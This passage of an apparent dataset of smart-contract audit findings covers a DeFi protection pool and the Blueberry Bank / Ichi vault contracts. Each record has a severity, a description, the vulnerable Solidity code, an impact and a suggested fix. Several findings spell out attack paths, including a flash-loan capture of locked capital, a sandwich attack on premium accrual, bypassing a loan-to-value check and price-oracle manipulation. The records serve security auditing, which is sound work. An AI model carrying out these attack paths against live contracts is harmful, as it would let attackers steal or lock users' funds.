_poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n\\nIn RiskFactor.canCalculateRiskFactor, we see there are three conditions when this is so:\\n```\\n function canCalculateRiskFactor(\\n uint256 _totalCapital,\\n uint256 _leverageRatio,\\n uint256 _leverageRatioFloor,\\n uint256 _leverageRatioCeiling,\\n uint256 _minRequiredCapital\\n ) external pure returns (bool _canCalculate) {\\n if (\\n _totalCapital < _minRequiredCapital ||\\n _leverageRatio < _leverageRatioFloor ||\\n _leverageRatio > _leverageRatioCeiling\\n ) {\\n _canCalculate = false;\\n } else {\\n _canCalculate = true;\\n }\\n }\\n}\\n```\\n\\nIf the leverage ratio is above the ceiling, then protection should be very cheap, and it is correct to use the minimum premium. If the leverage ratio is below the floor, then protection cannot be purchased. However, we see that the minimum premium is also used if _totalCapital is below _minRequiredCapital. 
In this case, protection should be very expensive, but it will instead be very cheap.чIssue If unlocked capital in pool falls below minRequiredCapital, then protection can be bought for minimum premium\\nProhibit protection purchases when capital falls below the minimum required capitalчBuyers can get very cheap protection at a time when it should be expensive.ч```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n _poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n -secondary markets are problematic with how `lockCapital` worksчmediumчSeeing that a pool is about to lock, an attacker can use a flash loan from a secondary market like uniswap to claim the share of a potential unlock of capital later.\\nThe timestamp a pool switches to `Late` can be predicted and an attacker can use this to call `assessState` which is callable by anyone. This will trigger the pool to move from Active/LateWithinGracePeriod to `Late` calling `lockCapital` on the ProtectionPool:\\n```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n\\nThis records who is holding sTokens at this point in time. 
If the borrower makes a payment and the pool turns back to Active, later the locked funds will be available to claim for the sToken holders at that snapshot:\\n```\\nFile: DefaultStateManager.sol\\n\\n /// The claimable amount for the given seller is proportional to the seller's share of the total supply at the snapshot\\n /// claimable amount = (seller's snapshot balance / total supply at snapshot) * locked capital amount\\n _claimableUnlockedCapital =\\n (_poolSToken.balanceOfAt(_seller, _snapshotId) *\\n lockedCapital.amount) /\\n _poolSToken.totalSupplyAt(_snapshotId);\\n```\\n\\nFrom docs:\\nIf sellers wish to redeem their capital and interest before the lockup period, they might be able to find a buyer of their sToken in a secondary market like Uniswap. Traders in the exchanges can long/short sTokens based on their opinion about the risk exposure associated with sTokens. Since an sToken is a fungible ERC20 token, it is fairly easy to bootstrap the secondary markets for protection sellers.\\nIf there is a uniswap (or similar) pool for this sToken, an attacker could potentially, using a flash loan, trigger the switch to `Late` and since they will be the ones holding the sTokens at the point of locking they will be the ones that can claim the funds at a potential unlock.чI recommend you make `assessState` only callable by a trusted user. This would remove the attack vector, since you must hold the tokens over a transaction. It would still be possible to use the withdraw bug, but if that is fixed this would remove the possibility to \"flash-lock\".чAn attacker can, using a flash loan from a secondary market like uniswap, steal a LPs possible share of unlocked tokens. 
Only paying taking the risk of the flash loan fee.ч```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n -Sandwich attack to accruePremiumAndExpireProtections()чhighчLet's show how a malicious user, Bob, can launch a sandwich attack to `accruePremiumAndExpireProtections()` and profit.\\nSuppose there are 1,000,000 underlying tokens for the `ProtectionPool`, and `totalSupply = 1,000,000`, therefore the exchange rate is 1/1 share. Suppose Bob has 100,000 shares.\\nSuppose `accruePremiumAndExpireProtections()` is going to be called and add 100,000 to `totalSTokenUnderlying` at L346.\\nBob front-runs `accruePremiumAndExpireProtections()` and calls `deposit()` to deposit 100,000 underlying tokens into the contract. The check for `ProtectionPoolPhase` will pass for an open phase. As a result, there are 1,100,000 underlying tokens, and 1,100,000 shares, the exchange rate is still 1/1 share. 
Bob now has 200,000 shares.\\n```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n\\nNow accruePremiumAndExpireProtections()gets called and 100,000 is added to `totalSTokenUnderlying` at L346. As a result, we have 1,200,000 underlying tokens with 1,100,000 shares. The exchange rate becomes 12/11 share.\\nBob calls the `withdraw()` function (assume he made a request two cycles back, he could do that since he had 100,000 underlying tokens in the pool) to withdraw 100,000 shares and he will get `100,000*12/11 = 109,090` underlying tokens. 
So he has a profit of 9,090 underlying tokens by the sandwich attack.чCreate a new contract as a temporary place to store the accrued premium, and then deliver it to the `ProtectionPool` over a period of time (delivery period) with some `premiumPerSecond` to lower the incentive of a quick profit by sandwich attack.\\nRestrict the maximum deposit amount for each cycle.\\nRestrict the maximum withdraw amount for each cycle.чA malicious user can launch a sandwich attack to accruePremiumAndExpireProtections()and profit.ч```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n -Users who deposit extra funds into their Ichi farming positions will lose all their ICHI rewardsчhighчWhen a user deposits extra funds into their Ichi farming position using `openPositionFarm()`, the old farming position will be closed down and a new one will be opened. 
Part of this process is that their ICHI rewards will be sent to the `IchiVaultSpell.sol` contract, but they will not be distributed. They will sit in the contract until the next user (or MEV bot) calls `closePositionFarm()`, at which point they will be stolen by that user.\\nWhen Ichi farming positions are opened via the `IchiVaultSpell.sol` contract, `openPositionFarm()` is called. It goes through the usual deposit function, but rather than staking the LP tokens directly, it calls `wIchiFarm.mint()`. This function deposits the token into the `ichiFarm`, encodes the deposit as an ERC1155, and sends that token back to the Spell:\\n```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // @ok if accIchiPerShare is always changing, so how does this work?\\n // it's basically just saving the accIchiPerShare at staking time, so when you unstake, it can calculate the difference\\n // really fucking smart actually\\n (uint256 ichiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, \"\");\\n return id;\\n}\\n```\\n\\nThe resulting ERC1155 is posted as collateral in the Blueberry Bank.\\nIf the user decides to add more funds to this position, they simply call `openPositionFarm()` again. The function has logic to check if there is already existing collateral of this LP token in the Blueberry Bank. 
If there is, it removes the collateral and calls `wIchiFarm.burn()` (which harvests the Ichi rewards and withdraws the LP tokens) before repeating the deposit process.\\n```\\nfunction burn(uint256 id, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n if (amount == type(uint256).max) {\\n amount = balanceOf(msg.sender, id);\\n }\\n (uint256 pid, uint256 stIchiPerShare) = decodeId(id);\\n _burn(msg.sender, id, amount);\\n\\n uint256 ichiRewards = ichiFarm.pendingIchi(pid, address(this));\\n ichiFarm.harvest(pid, address(this));\\n ichiFarm.withdraw(pid, amount, address(this));\\n\\n // Convert Legacy ICHI to ICHI v2\\n if (ichiRewards > 0) {\\n ICHIv1.safeApprove(address(ICHI), ichiRewards);\\n ICHI.convertToV2(ichiRewards);\\n }\\n\\n // Transfer LP Tokens\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransfer(msg.sender, amount);\\n\\n // Transfer Reward Tokens\\n (uint256 enIchiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 stIchi = (stIchiPerShare * amount).divCeil(1e18);\\n uint256 enIchi = (enIchiPerShare * amount) / 1e18;\\n\\n if (enIchi > stIchi) {\\n ICHI.safeTransfer(msg.sender, enIchi - stIchi);\\n }\\n return pid;\\n}\\n```\\n\\nHowever, this deposit process has no logic for distributing the ICHI rewards. Therefore, these rewards will remain sitting in the `IchiVaultSpell.sol` contract and will not reach the user.\\nFor an example of how this is handled properly, we can look at the opposite function, `closePositionFarm()`. In this case, the same `wIchiFarm.burn()` function is called. 
But in this case, it's followed up with an explicit call to withdraw the ICHI from the contract to the user.\\n```\\ndoRefund(ICHI);\\n```\\n\\nThis `doRefund()` function refunds the contract's full balance of ICHI to the `msg.sender`, so the result is that the next user to call `closePositionFarm()` will steal the ICHI tokens from the original user who added to their farming position.чIssue Users who deposit extra funds into their Ichi farming positions will lose all their ICHI rewards\\nIn the `openPositionFarm()` function, in the section that deals with withdrawing existing collateral, add a line that claims the ICHI rewards for the calling user.\\n```\\nif (collSize > 0) {\\n (uint256 decodedPid, ) = wIchiFarm.decodeId(collId);\\n if (farmingPid != decodedPid) revert INCORRECT_PID(farmingPid);\\n if (posCollToken != address(wIchiFarm))\\n revert INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wIchiFarm.burn(collId, collSize);\\n// Add the line below\\n doRefund(ICHI);\\n}\\n```\\nчUsers who farm their Ichi LP tokens for ICHI rewards can permanently lose their rewards.ч```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // @ok if accIchiPerShare is always changing, so how does this work?\\n // it's basically just saving the accIchiPerShare at staking time, so when you unstake, it can calculate the difference\\n // really fucking smart actually\\n (uint256 ichiPerShare, , ) = 
ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, \"\");\\n return id;\\n}\\n```\\n -LP tokens are not sent back to withdrawing userчhighчWhen users withdraw their assets from `IchiVaultSpell.sol`, the function unwinds their position and sends them back their assets, but it never sends them back the amount they requested to withdraw, leaving the tokens stuck in the Spell contract.\\nWhen a user withdraws from `IchiVaultSpell.sol`, they either call `closePosition()` or `closePositionFarm()`, both of which make an internal call to `withdrawInternal()`.\\nThe following arguments are passed to the function:\\nstrategyId: an index into the `strategies` array, which specifies the Ichi vault in question\\ncollToken: the underlying token, which is withdrawn from Compound\\namountShareWithdraw: the number of underlying tokens to withdraw from Compound\\nborrowToken: the token that was borrowed from Compound to create the position, one of the underlying tokens of the vault\\namountRepay: the amount of the borrow token to repay to Compound\\namountLpWithdraw: the amount of the LP token to withdraw, rather than trade back into borrow tokens\\nIn order to accomplish these goals, the contract does the following...\\nRemoves the LP tokens from the ERC1155 holding them for collateral.\\n```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n\\nCalculates the number of LP tokens to withdraw from the vault.\\n```\\nuint256 amtLPToRemove = vault.balanceOf(address(this)) - amountLpWithdraw;\\nvault.withdraw(amtLPToRemove, address(this));\\n```\\n\\nConverts the non-borrowed token that was withdrawn in the borrowed token (not copying the code in, as it's not relevant to this issue).\\nWithdraw the underlying token from Compound.\\n```\\ndoWithdraw(collToken, amountShareWithdraw);\\n```\\n\\nPay back the borrowed token to Compound.\\n```\\ndoRepay(borrowToken, amountRepay);\\n```\\n\\nValidate that this situation does 
not put us above the maxLTV for our loans.\\n```\\n_validateMaxLTV(strategyId);\\n```\\n\\nSends the remaining borrow token that weren't paid back and withdrawn underlying tokens to the user.\\n```\\ndoRefund(borrowToken);\\ndoRefund(collToken);\\n```\\n\\nCrucially, the step of sending the remaining LP tokens to the user is skipped, even though the function specifically does the calculations to ensure that `amountLpWithdraw` is held back from being taken out of the vault.чAdd an additional line to the `withdrawInternal()` function to refund all LP tokens as well:\\n```\\n doRefund(borrowToken);\\n doRefund(collToken);\\n// Add the line below\\n doRefund(address(vault));\\n```\\nчUsers who close their positions and choose to keep LP tokens (rather than unwinding the position for the constituent tokens) will have their LP tokens stuck permanently in the IchiVaultSpell contract.ч```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n -Users can get around MaxLTV because of lack of strategyId validationчhighчWhen a user withdraws some of their underlying token, there is a check to ensure they still meet the Max LTV requirements. 
However, they are able to arbitrarily enter any `strategyId` that they would like for this check, which could allow them to exceed the LTV for their real strategy while passing the approval.\\nWhen a user calls `IchiVaultSpell.sol#reducePosition()`, it removes some of their underlying token from the vault, increasing the LTV of any loans they have taken.\\nAs a result, the `_validateMaxLTV(strategyId)` function is called to ensure they remain compliant with their strategy's specified LTV:\\n```\\nfunction _validateMaxLTV(uint256 strategyId) internal view {\\n uint256 debtValue = bank.getDebtValue(bank.POSITION_ID());\\n (, address collToken, uint256 collAmount, , , , , ) = bank\\n .getCurrentPositionInfo();\\n uint256 collPrice = bank.oracle().getPrice(collToken);\\n uint256 collValue = (collPrice * collAmount) /\\n 10**IERC20Metadata(collToken).decimals();\\n\\n if (\\n debtValue >\\n (collValue * maxLTV[strategyId][collToken]) / DENOMINATOR\\n ) revert EXCEED_MAX_LTV();\\n}\\n```\\n\\nTo summarize, this check:\\nPulls the position's total debt value\\nPulls the position's total value of underlying tokens\\nPulls the specified maxLTV for this strategyId and underlying token combination\\nEnsures that `underlyingTokenValue * maxLTV > debtValue`\\nBut there is no check to ensure that this `strategyId` value corresponds to the strategy the user is actually invested in, as we can see the `reducePosition()` function:\\n```\\nfunction reducePosition(\\n uint256 strategyId,\\n address collToken,\\n uint256 collAmount\\n) external {\\n doWithdraw(collToken, collAmount);\\n doRefund(collToken);\\n _validateMaxLTV(strategyId);\\n}\\n```\\n\\nHere is a quick proof of concept to explain the risk:\\nLet's say a user deposits 1000 DAI as their underlying collateral.\\nThey are using a risky strategy (let's call it strategy 911) which requires a maxLTV of 2X (ie maxLTV[911][DAI] = 2e5)\\nThere is another safer strategy (let's call it strategy 411) which has a maxLTV of 5X (ie 
maxLTV[411][DAI] = 4e5)\\nThe user takes the max loan from the risky strategy, borrowing $2000 USD of value.\\nThey are not allowed to take any more loans from that strategy, or remove any of their collateral.\\nThen, they call `reducePosition()`, withdrawing 1600 DAI and entering `411` as the strategyId.\\nThe `_validateMaxLTV` check will happen on `strategyId = 411`, and will pass, but the result will be that the user now has only 400 DAI of underlying collateral protecting $2000 USD worth of the risky strategy, violating the LTV.чIssue Users can get around MaxLTV because of lack of strategyId validation\\nSince the collateral a position holds will always be the vault token of the strategy they have used, you can validate the `strategyId` against the user's collateral, as follows:\\n```\\naddress positionCollToken = bank.positions(bank.POSITION_ID()).collToken;\\naddress positionCollId = bank.positions(bank.POSITION_ID()).collId;\\naddress unwrappedCollToken = IERC20Wrapper(positionCollToken).getUnderlyingToken(positionCollId);\\nrequire(strategies[strategyId].vault == unwrappedCollToken, \"wrong strategy\");\\n```\\nчUsers can get around the specific LTVs and create significantly higher leverage bets than the protocol has allowed. 
This could cause the protocol to get underwater, as the high leverage combined with risky assets could lead to dramatic price swings without adequate time for the liquidation mechanism to successfully protect solvency.ч```\\nfunction _validateMaxLTV(uint256 strategyId) internal view {\\n uint256 debtValue = bank.getDebtValue(bank.POSITION_ID());\\n (, address collToken, uint256 collAmount, , , , , ) = bank\\n .getCurrentPositionInfo();\\n uint256 collPrice = bank.oracle().getPrice(collToken);\\n uint256 collValue = (collPrice * collAmount) /\\n 10**IERC20Metadata(collToken).decimals();\\n\\n if (\\n debtValue >\\n (collValue * maxLTV[strategyId][collToken]) / DENOMINATOR\\n ) revert EXCEED_MAX_LTV();\\n}\\n```\\n -Users can be liquidated prematurely because calculation understates value of underlying positionчhighчWhen the value of the underlying asset is calculated in `getPositionRisk()`, it uses the `underlyingAmount`, which is the amount of tokens initially deposited, without any adjustment for the interest earned. This can result in users being liquidated early, because the system undervalues their assets.\\nA position is considered liquidatable if it meets the following criteria:\\n```\\n((borrowsValue - collateralValue) / underlyingValue) >= underlyingLiqThreshold\\n```\\n\\nThe value of the underlying tokens is a major factor in this calculation. However, the calculation of the underlying value is performed with the following function call:\\n```\\nuint256 cv = oracle.getUnderlyingValue(\\n pos.underlyingToken,\\n pos.underlyingAmount\\n);\\n```\\n\\nIf we trace it back, we can see that `pos.underlyingAmount` is set when `lend()` is called (ie when underlying assets are deposited). This is the only place in the code where this value is moved upward, and it is only increased by the amount deposited. 
It is never moved up to account for the interest payments made on the deposit, which can materially change the value.чValue of the underlying assets should be derived from the vault shares and value, rather than being stored directly.чUsers can be liquidated prematurely because the value of their underlying assets are calculated incorrectly.ч```\\n((borrowsValue - collateralValue) / underlyingValue) >= underlyingLiqThreshold\\n```\\n -Interest component of underlying amount is not withdrawable using the `withdrawLend` function. Such amount is permanently locked in the BlueBerryBank contractчhighчSoft vault shares are issued against interest bearing tokens issued by `Compound` protocol in exchange for underlying deposits. However, `withdrawLend` function caps the withdrawable amount to initial underlying deposited by user (pos.underlyingAmount). Capping underlying amount to initial underlying deposited would mean that a user can burn all his vault shares in `withdrawLend` function and only receive original underlying deposited.\\nInterest accrued component received from Soft vault (that rightfully belongs to the user) is no longer retrievable because the underlying vault shares are already burnt. Loss to the users is permanent as such interest amount sits permanently locked in Blueberry bank.\\n`withdrawLend` function in `BlueBerryBank` allows users to withdraw underlying amount from `Hard` or `Soft` vaults. `Soft` vault shares are backed by interest bearing `cTokens` issued by Compound Protocol\\nUser can request underlying by specifying `shareAmount`. When user tries to send the maximum `shareAmount` to withdraw all the lent amount, notice that the amount withdrawable is limited to the `pos.underlyingAmount` (original deposit made by the user).\\nWhile this is the case, notice also that the full `shareAmount` is deducted from `underlyingVaultShare`. 
User cannot recover remaining funds because in the next call, user doesn't have any vault shares against his address. Interest accrued component on the underlying that was returned by `SoftVault` to `BlueberryBank` never makes it back to the original lender.\\n```\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\nчIntroduced a new variable to adjust positions & removed cap on withdraw amount.\\nHighlighted changes I recommend to withdrawLend with //******//.\\n```\\nfunction withdrawLend(address token, uint256 shareAmount)\\n external\\n override\\n inExec\\n poke(token)\\n {\\n Position storage pos = positions[POSITION_ID];\\n Bank storage bank = banks[token];\\n if (token != pos.underlyingToken) revert INVALID_UTOKEN(token);\\n \\n //*********-audit cap shareAmount to maximum value, pos.underlyingVaultShare*******\\n if (shareAmount > pos.underlyingVaultShare) {\\n shareAmount = pos.underlyingVaultShare;\\n }\\n\\n // if (shareAmount == type(uint256).max) {\\n // shareAmount = pos.underlyingVaultShare;\\n // } \\n\\n uint256 wAmount;\\n uint256 amountToOffset; //*********- audit added this to adjust position********\\n if (address(ISoftVault(bank.softVault).uToken()) == token) {\\n ISoftVault(bank.softVault).approve(\\n bank.softVault,\\n type(uint256).max\\n );\\n wAmount = ISoftVault(bank.softVault).withdraw(shareAmount);\\n } else {\\n wAmount = IHardVault(bank.hardVault).withdraw(token, shareAmount);\\n }\\n\\n //*********- audit calculate amountToOffset********\\n //*********-audit not capping wAmount anymore*******\\n amountToOffset = wAmount > pos.underlyingAmount\\n ? 
pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n //*********-audit subtract amountToOffset instead of wAmount*******\\n pos.underlyingAmount -= amountToOffset;\\n bank.totalLend -= amountToOffset;\\n\\n wAmount = doCutWithdrawFee(token, wAmount);\\n\\n IERC20Upgradeable(token).safeTransfer(msg.sender, wAmount);\\n }\\n```\\nчEvery time, user withdraws underlying from a Soft vault, interest component gets trapped in BlueBerry contract. Here is a scenario.\\nAlice deposits 1000 USDC into `SoftVault` using the `lend` function of BlueberryBank at T=0\\nUSDC soft vault mints 1000 shares to Blueberry bank\\nUSDC soft vault deposits 1000 USDC into Compound & receives 1000 cUSDC\\nAlice at T=60 days requests withdrawal against 1000 Soft vault shares\\nSoft Vault burns 1000 soft vault shares and requests withdrawal from Compound against 1000 cTokens\\nSoft vault receives 1050 USDC (50 USDC interest) and sends this to BlueberryBank\\nBlueberry Bank caps the withdrawal amount to 1000 (original deposit)\\nBlueberry Bank deducts 0.5% withdrawal fees and deposits 995 USDC back to user\\nIn the whole process, Alice has lost access to 50 USDC.ч```\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\n -BlueBerryBank#withdrawLend will cause underlying token accounting error if soft/hard vault has withdraw feeчhighчSoft/hard vaults can have a withdraw fee. This takes a certain percentage from the user when they withdraw. The way that the token accounting works in BlueBerryBank#withdrawLend, it will only remove the amount returned by the hard/soft vault from pos.underlying amount. 
If there is a withdraw fee, underlying amount will not be decreased properly and the user will be left with phantom collateral that they can still use.\\n```\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp <\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n```\\n\\nBoth SoftVault and HardVault implement a withdraw fee. Here we see that withdrawAmount (the return value) is decreased by the fee amount.\\n```\\n uint256 wAmount;\\n if (address(ISoftVault(bank.softVault).uToken()) == token) {\\n ISoftVault(bank.softVault).approve(\\n bank.softVault,\\n type(uint256).max\\n );\\n wAmount = ISoftVault(bank.softVault).withdraw(shareAmount);\\n } else {\\n wAmount = IHardVault(bank.hardVault).withdraw(token, shareAmount);\\n }\\n\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\n\\nThe return value is stored as `wAmount` which is then subtracted from `pos.underlyingAmount`; the issue is that the withdraw fee has now caused a token accounting error for `pos`. We see that the fee paid to the hard/soft vault is NOT properly removed from `pos.underlyingAmount`. This leaves the user with phantom underlying which doesn't actually exist but that the user can use to take out loans.\\nExample: For simplicity let's say that 1 share = 1 underlying and the soft/hard vault has a fee of 5%. Imagine a user deposits 100 underlying to receive 100 shares. Now the user withdraws their 100 shares while the hard/soft vault has a withdraw fee. This burns 100 shares and softVault/hardVault.withdraw returns 95 (100 - 5). 
During the token accounting pos.underlyingVaultShares are decreased to 0 but pos.underlyingAmount is still equal to 5 (100 - 95).\\n```\\n uint256 cv = oracle.getUnderlyingValue(\\n pos.underlyingToken,\\n pos.underlyingAmount\\n );\\n```\\n\\nThis accounting error is highly problematic because collateralValue uses pos.underlyingAmount to determine the value of collateral for liquidation purposes. This allows the user to take on more debt than they should.ч`HardVault/SoftVault#withdraw` should also return the fee paid to the vault, so that it can be accounted for.чUser is left with collateral that isn't real but that can be used to take out a loanч```\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp <\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n```\\n -IchiLpOracle is extemely easy to manipulate due to how IchiVault calculates underlying token balancesчhighч`IchiVault#getTotalAmounts` uses the `UniV3Pool.slot0` to determine the number of tokens it has in it's position. `slot0` is the most recent data point and is therefore extremely easy to manipulate. Given that the protocol specializes in leverage, the effects of this manipulation would compound to make malicious uses even easier.\\nICHIVault.sol\\n```\\nfunction _amountsForLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity\\n) internal view returns (uint256, uint256) {\\n (uint160 sqrtRatioX96, , , , , , ) = IUniswapV3Pool(pool).slot0();\\n return\\n UV3Math.getAmountsForLiquidity(\\n sqrtRatioX96,\\n UV3Math.getSqrtRatioAtTick(tickLower),\\n UV3Math.getSqrtRatioAtTick(tickUpper),\\n liquidity\\n );\\n}\\n```\\n\\n`IchiVault#getTotalAmounts` uses the `UniV3Pool.slot0` to determine the number of tokens it has in it's position. 
slot0 is the most recent data point and can easily be manipulated.\\n`IchiLPOracle` directly uses the token values returned by `vault#getTotalAmounts`. This allows a malicious user to manipulate the valuation of the LP. An example of this kind of manipulation would be to use large buys/sells to alter the composition of the LP to make it worth less or more.чToken balances should be calculated inside the oracle instead of getting them from the `IchiVault`. To determine the liquidity, use a TWAP instead of `slot0`.чIchi LP value can be manipulated to cause loss of funds for the protocol and other usersч```\\nfunction _amountsForLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity\\n) internal view returns (uint256, uint256) {\\n (uint160 sqrtRatioX96, , , , , , ) = IUniswapV3Pool(pool).slot0();\\n return\\n UV3Math.getAmountsForLiquidity(\\n sqrtRatioX96,\\n UV3Math.getSqrtRatioAtTick(tickLower),\\n UV3Math.getSqrtRatioAtTick(tickUpper),\\n liquidity\\n );\\n}\\n```\\n -IchiLpOracle returns inflated price due to invalid calculationчmediumч`IchiLpOracle` returns inflated price due to invalid calculation\\nIf you run the tests, then you can see that IchiLpOracle returns inflated price for the ICHI_USDC vault\\n```\\nSTATICCALL IchiLpOracle.getPrice(token=0xFCFE742e19790Dd67a627875ef8b45F17DB1DaC6) => (1101189125194558706411110851447)\\n```\\n\\nAs the documentation says, the token price should be in USD with 18 decimals of precision. The price returned here is `1101189125194_558706411110851447` This is 1.1 trillion USD when considering the 18 decimals.\\nThe test uses real values except for mocking ichi and usdc price, which are returned by the mock with correct decimals (1e18 and 1e6)чIssue IchiLpOracle returns inflated price due to invalid calculation\\nFix the LP token price calculation. 
The problem is that you multiply totalReserve with extra 1e18 (return (totalReserve * 1e18) / totalSupply;).ч`IchiLpOracle` price is used in `_validateMaxLTV` (collToken is the vault). Therefore the collateral value is inflated and users can open bigger positions than their collateral would normally allow.ч```\\nSTATICCALL IchiLpOracle.getPrice(token=0xFCFE742e19790Dd67a627875ef8b45F17DB1DaC6) => (1101189125194558706411110851447)\\n```\\n -totalLend isn't updated on liquidation, leading to permanently inflated valueчmediumч`bank.totalLend` tracks the total amount that has been lent of a given token, but it does not account for tokens that are withdrawn when a position is liquidated. As a result, the value will become overstated, leading to inaccurate data on the pool.\\nWhen a user lends a token to the Compound fork, the bank for that token increases its `totalLend` parameter:\\n```\\nbank.totalLend += amount;\\n```\\n\\nSimilarly, this value is decreased when the amount is withdrawn.\\nIn the event that a position is liquidated, the `underlyingAmount` and `underlyingVaultShare` for the user are decreased based on the amount that will be transferred to the liquidator.\\n```\\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 